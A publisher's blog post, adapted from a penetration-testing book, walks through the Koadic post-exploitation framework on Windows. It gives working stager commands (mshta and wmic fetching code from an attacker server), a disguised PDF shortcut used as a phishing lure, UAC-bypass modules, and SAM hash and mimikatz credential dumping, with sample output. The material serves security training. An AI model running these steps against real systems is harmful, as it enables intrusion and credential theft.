Administration

What Is the Koadic Postexploitation Framework?

Koadic is a tool for penetration testing or internal vulnerability testing in your own Windows network.

 

The developers describe it as a command and control post-exploitation rootkit that uses either Windows Script Host, which is a COM-based runtime environment, or VBScript modules for its numerous attacks. It can be used for operating systems from Windows 2000 to Windows 10.

 

As is common with other postexploitation frameworks, Koadic requires a client-server environment that’s structured in a modular way. Those who have already used Metasploit or Empire will already know the procedure.

 

Installing the Server

You have two options to install Koadic. If you use the current version of Kali Linux, you can install Koadic directly via sudo apt install koadic. Alternatively, you can use the GitHub repository to install the latest version directly. To do this, you must run the following commands in the Linux terminal:

 

cd /opt

git clone https://github.com/zerosum0x0/koadic.git

cd koadic

pip3 install -r requirements.txt

 

This way, you clone the repository to the /opt/koadic folder and then install the necessary dependencies via the Pip Python package manager.

 

If everything went through without any problem, a very spartan interface starts, showing the installed version and the number of modules present:

 

./koadic

   ~[ Version: 0xB ]~

   ~[ Stagers: 6 ]~

   ~[ Implants: 46 ]~

   (koadic: sta/js/mshta)#

 

In the following sections, we assume that you use Koadic on Kali Linux. You need to adjust the sample paths as necessary. First, you should look at the autorun.example file in the Koadic directory. To do this, exit the server using the exit command and call the file with your favorite text editor:

 

set SRVPORT 9001

set ENDPOINT test123 # this will be the URL: /test123

run

 

Within this configuration file, important parameters are passed, which are executed at program start. In the example, the server port and the ENDPOINT URL have already been stored. Of course, you must adapt these to your test environment. You can find comprehensive documentation on the project website.

 

Very important parameters include, for example, CERTPATH and KEYPATH, which are used to include certificates for an encrypted connection between clients and server. You can call this configuration file with the --autorun parameter at Koadic program startup. However, for a first test you can also use the sample file. To do this, copy this file to autorun.cfg, for example, and start the server with the parameters set there:

 

(koadic: sta/js/mshta)# set SRVPORT 9001

   [+] SRVPORT =>; 9001

4

(koadic: sta/js/mshta)# set ENDPOINT test123

   [+] ENDPOINT =>; test123

 

(koadic: sta/js/mshta)# run

   [+] Spawned a stager at http://192.168.171.105:9001/test123

   [!] Don't edit this URL! (See: 'help portfwd')

   [>;] mshta http://192.168.171.105:9001/test123

 

(koadic: sta/js/mshta)#

 

As indicated in the warning, you shouldn’t change the URL now. This is the only way to ensure that clients can reach the server without problems.

 

Using Helper Tools in the Program

Before we present the other capabilities of Koadic, we want to describe some basic “helper tools” in the program. The help command provides tips everywhere in the environment with regard to which commands are usable in the respective segment. The command line addition via the tab key helps you find your way around the environment and select possible parameters quickly. A simple keystroke lists the available commands in the main directory, for example:

 

(koadic: sta/js/mshta)# <tab key>

 

   ? creds execute help kill options pyexec run sounds use

   api domain exit info listeners portfwd quit sessions taco

   verbose cmdshell edit exploit jobs load previous repeatjobs

   set unset zombies

 

Creating Connections from a Client to the Server

The way a connection is created from the Windows client to the Koadic server is left to the ingenuity of the respective attacker or penetration tester. The general approach is illustrated by the following scenario; the approach corresponds to a classic spear phishing attack (see figure below):

  1. The attacker connects to the remote server via SSH.
  2. The attacker sends an email to the target from a seemingly trusted source.
  3. The file in the attachment is supposedly a PDF document, but it turns out to be a link file and creates a connection to the Koadic server via the link stored there.

Illustration of the Attack

 

So first you need bait to make the connection. To do this, you want to create an Offer.pdf.lnk file. For this purpose, you use a Windows 10 PC and create a shortcut on the desktop.

 

The Bait

 

In the generated file, you need to adjust the listed fields to the following values:

 

Target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

           “Start-Process mshta http://192.168.171.105:9001/test123“

Start in: %SYSTEMROOT%\system32\WindowsPowershell\v1.0

 

This will call PowerShell and start a process that connects to the Koadic server. Here, mstha stands for Microsoft HTML application host. The big advantage of this attack is that this file is part of every Windows installation and is signed by Microsoft. It can be used to execute code; in this case, it specifies the network address that was displayed when Koadic was started. This is how the client you are taking over starts.

 

Give your bait an enticing name. If you want, you can also set a different file icon. However, the selected icon should also be available later in the target system under the same file name; otherwise, it won’t be displayed there.

 

That’s all there is to it! You can now copy the link files to any target system in your test environment and test whether a connection to the server is established when they’re called.

 

Virus Protection and Obfuscate: Some antivirus programs have already registered Koadic as malware and included appropriate signatures. The developers are trying to counteract this and have introduced the obfuscate parameter for this purpose, which you may have noticed in the configuration file. Over time, more ways to hide the payload from these programs should be added. In the end, it will become a game of cat and mouse, in which sometimes one side and sometimes the other will gain the upper hand.

 

Creating a First Connection: Zombie 0

Once you run the link files on the target system, the incoming connection will be displayed as a zombie on the Koadic server. The continuous count starts with zero. The zombies command can then be used to call more information about the source IP address and the status of the connection, so this communication is similar to a session in other frameworks:

 

[+] Zombie 0: Staging new connection (192.168.171.166)

[+] Zombie 0: WIN10PC\John @ WIN10PC -- Windows 10 Pro

(koadic: sta/js/mshta)# zombies

 

ID          IP                    STATUS    LAST SEEN

---         ---------------       -------   -------------------

0           192.168.171.166       Alive     2019-09-13 16:52:12

 

The Modules of Koadic

As you’ve already seen in the first call of the Koadic server, the modules are divided into stagers and implants. Here, the stagers are primarily used to establish a connection from the client to the server. If no stager is selected, sta/js/mshta is used by default, which is also the most reliable one according to the developers. You can find out which stagers are included by using the listeners command:

 

koadic: sta/js/mshta)# listeners

 

ID          IP                           PORT    TYPE

----        ---------                 -----      -------

0            192.168.171.105    9001     stager/js/mshta

 

If you want to use other stagers, you should specify them in the configuration file at program startup or select them via the use "Stagername" command. Here too, the run command is used to transfer the selection to the server. For example, if you want to use the Windows Management Instrumentation Command Line, you should enable the wmic stager:

 

koadic: sta/js/mshta)# use stager/js/wmic

(koadic: sta/js/wmic)# run

 

   [+] Spawned a stager at http://192.168.171.105:9996/YH0O8.xsl

   [!] Don't edit this URL! (See: 'help portfwd')

   [>] wmic os get /FORMAT:"http://192.168.171.105:9996/YH0O8.xsl"

 

(koadic: sta/js/wmic)# listeners

 

ID          IP                       PORT    TYPE

----        ---------                -----   -------

0           192.168.171.105          9001    stager/js/mshta

1           192.168.171.105          9996    stager/js/wmic

 

Implants are most comparable to the post modules in the Empire framework. They are transferred to the target systems via the existing zombie connections to do their work. In this process, when an implant is executed, the Koadic server creates a work order called a job.

 

The individual implants are divided into categories that you use in the various stages of postexploitation. Thus, in the directories you will find modules for elevation, gathering, managing, persistence, pivoting, scanning, and other tools.

 

A brief overview of the various implants can be found on the developers’ GitHub page. However, you can also use the use command and (Tab) to navigate through the menu structure:

 

(koadic: sta/js/wmic)# use implant/[TAB]

 

   elevate/ fun/ gather/ inject/ manage/ persist/

   phish/ pivot/ scan/ util/

 

(koadic: sta/js/wmic)# use implant/gather/[TAB]

 

   clipboard enum_printers enum_users hashdump_sam

   office_key windows_key

 

   enum_domain_info enum_shares hashdump_dc loot_finder

   user_hunter

 

(koadic: sta/js/wmic)# use implant/gather/clipboard

(koadic: imp/gat/clipboard)# info

 

NAME           VALUE          REQ      DESCRIPTION

-----          ----------     ----     -------------

ZOMBIE         ALL            yes      the zombie to target

 

The info command then lists the necessary parameters for the selected module. In this example, the clipboard is to be read from all target systems. The ALL parameter is set by default. However, you can also select only certain zombie connections using the set command. Using run, you finally execute the selected module:

 

(koadic: imp/gat/clipboard)# set ZOMBIE 0

 

   [+] ZOMBIE =>; 0

 

(koadic: imp/gat/clipboard)# run

 

   [*] Zombie 0: Job 1 (implant/gather/clipboard) created.

   [+] Zombie 0: Job 1 (implant/gather/clipboard) completed.

   Clipboard contents: Secret1234

 

Extending Rights and Reading Password Hashes

Koadic is an incredibly versatile tool that we can’t describe in detail here. However, we would like to explain the general mode of operation by means of a rights escalation and the reading of password hashes or passwords.

 

We assume that the file Offer.pdf.lnk was launched on two PCs with user rights. The first PC runs Windows 7, the second Windows 10. Thus, zombie connections 0 and 1 were created on the Koadic server:

 

(koadic: imp/ele/bypassuac_fodhelper)# zombies

 

ID          IP                STATUS      LAST SEEN

--          ---------------   ------      -------------------

0           192.168.171.166   Alive       2019-09-14 11:05:26

1           192.168.171.230   Alive       2019-09-14 11:05:26

 

You now want to obtain administrator rights on both computers. For this purpose, Koadic provides various modules in the elevate subdirectory. For Windows 10, you can use implant/elevate/bypassuac_fodhelper and get the necessary parameters with the info command:

 

koadic: sta/js/mshta) use implant/elevate/bypassuac_fodhelper

 

(koadic: imp/ele/bypassuac_fodhelper)# info

 

   NAME VALUE REQ DESCRIPTION

   PAYLOAD yes run listeners for a list of IDs

   ZOMBIE ALL yes the zombie to target

 

In this context, the term PAYLOAD is a bit confusing. This is the stager ID used for Koadic. You’ve already output the stagers via the listeners command. As a rule, it’s sufficient here to set the value to 0. On the other hand, we do not recommend leaving the parameter for the zombie connection set to ALL; instead, we recommend specifying the applicable ID here in each case.

 

Once you’ve entered everything using set, you can instruct Koadic to run the module using run. This creates a job and outputs further information. If the attack was successful, another zombie should be displayed. The asterisk (*) after the ID indicates that this connection now has administrator rights.

 

Now you can proceed in the same way for the Windows 7 PC. However, here you need the implant/elevate/bypassuac_eventvwr module.

 

With this, you’ll get two new connections:

 

(koadic: imp/ele/bypassuac_eventvwr)# zombies

 

   ID      IP                STATUS     LAST SEEN

   --      ---------------   ------     -------------------

   0       192.168.171.166   Alive      2019-09-14 11:07:07

   1       192.168.171.230   Alive      2019-09-14 11:07:07

   2*      192.168.171.166   Alive      2019-09-14 11:07:07

   3*      192.168.171.230   Alive      2019-09-14 11:07:07

 

Now you’ve fulfilled the requirements to read the passwords or hash values in the target systems. Koadic provides the necessary modules in the gather or inject directories.

 

Use the implant/gather/hashdump_sam module to read password hashes on Windows 10. You can leave the preset parameters and only need to enter the zombie ID. However, make sure that you select the correct connection with administrator rights (2* in the example). Otherwise, the attempt will fail because you do not have sufficient rights.

 

For Windows 7, you must use the implant/inject/mimikatz_dotnet2js module in the same way. This way, with a little luck, you’ll also obtain the login passwords in plain text. The creds command lists the results:

 

Cred ID     IP                USERNAME + DOMAIN

-------     ---------------   ------------------

0           192.168.171.230   John WIN7CLIENT Secret1234

5           192.168.171.166   WDAGUtilityAccount WIN10PC

6           192.168.171.166   Win10PC WIN10PC

7           192.168.171.166   John WIN10PC

 

   PASSWORD NTLM

   -------------------------------

   4ceb37c54b65aabf5abd537c6d285123

   e3c560b7ff401f8456c69001aa42d979

   c02de0449053f00a6df2ff9177f294ca

   3ec82c448595c1a415b550e1b0c6ec68

 

Conclusion and Countermeasures

Koadic is a postexploitation framework that is in the early stages of development, but it already comes with many useful modules. It remains to be seen what tricks the developers can incorporate to make it harder for antivirus programs to find the payloads. Because most of the zombie connections are unwanted connections to the internet, a firewall combined with a proxy server equipped with user authentication helps as a countermeasure.

 

Editor’s note: This post has been adapted from a section of the book Hacking and Security: The Comprehensive Guide to Penetration Testing and Cybersecurity by Michael Kofler, Klaus Gebeshuber, Peter Kloep, Frank Neugebauer, André Zingsheim, Thomas Hackner, Markus Widl, Roland Aigner, Stefan Kania, Tobias Scheible, and Matthias Wübbeling.

Recommendation

Hacking and Security
Hacking and Security

Uncover security vulnerabilities and harden your system against attacks! With this guide you’ll learn to set up a virtual learning environment where you can test out hacking tools, from Kali Linux to hydra and Wireshark. Then expand your understanding of offline hacking, external safety checks, penetration testing in networks, and other essential security techniques, with step-by-step instructions. With information on mobile, cloud, and IoT security you can fortify your system against any threat!

Learn More
Rheinwerk Computing
by Rheinwerk Computing

Rheinwerk Computing is an imprint of Rheinwerk Publishing and publishes books by leading experts in the fields of programming, administration, security, analytics, and more.

Comments